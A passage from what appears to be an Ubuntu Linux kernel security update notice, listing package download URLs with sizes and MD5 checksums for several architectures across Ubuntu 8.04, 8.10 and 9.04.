http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    83682 bcafd92384fdae95293c310f83443303\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    22356 aa2c6396604a45f318881df2e562f625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb\n      Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   270064 879ee6667df636551d565e10ae5162fd\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   175444 37239b1899dd449d5b4985163c46d678\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    40398 81325db98acd64573c100455f0cb5289\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e\n\nUpdated packages for Ubuntu 8.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz\n      Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc\n      Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz\n      Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb\n      Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb\n      Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb\n      Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   186500 940e6b351f4975369720543184596a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   168150 696ed64f02936c7200cc9a468302de40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    68544 cd2e39978716c3448e54d6862877957c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13614 c860448fa643364e8776a4947cff9714\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86942 49099dad48131ce191b10c154f096d6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5:   645046 28f8ea5f653057c350d40feb64d68f2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb\n      Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb\n      Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz\n      Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc\n      Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz\n      Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb\n      Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb\n      Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb\n      Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   215170 7939440a8813110d952d86b49113e146\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9\n    